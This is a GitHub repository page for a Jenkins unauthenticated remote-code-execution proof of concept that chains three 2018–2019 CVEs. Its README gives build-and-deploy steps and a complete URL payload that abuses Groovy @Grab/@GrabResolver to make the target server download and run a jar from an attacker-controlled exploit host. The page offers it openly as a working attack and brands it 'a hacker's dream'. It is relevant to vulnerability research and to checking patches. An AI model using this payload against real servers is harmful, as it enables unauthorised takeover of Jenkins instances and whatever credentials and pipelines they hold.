GitHub - petercunha/jenkins-rce: :smiling_imp: Jenkins RCE PoC. From unauthenticated user to remote code execution, it's a hacker's dream!

petercunha / jenkins-rce Public

Notifications You must be signed in to change notification settings
Fork 66
Star 295

😈 Jenkins RCE PoC. From unauthenticated user to remote code execution, it's a hacker's dream!

295 stars 66 forks Branches Tags Activity

Notifications

Name		Name	Last commit message	Last commit date
Latest commit History 9 Commits
code		code
www/package/payload/1		www/package/payload/1
README.txt		README.txt
build.sh		build.sh

Repository files navigation

JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION
---------------------------------------------

Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw).

It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!

Read his write-ups on this exploit here -
Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
His github: https://github.com/orangetw


INSTRUCTIONS:
-------------
- Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder.
- Once that is finished, copy the inner contents of www/ to a webserver.
- In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> to the hostname of where you uploaded your files.


URL Payload:
------------
http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a
@Grab(group='package', module='payload', version='1')%0a
import Payload;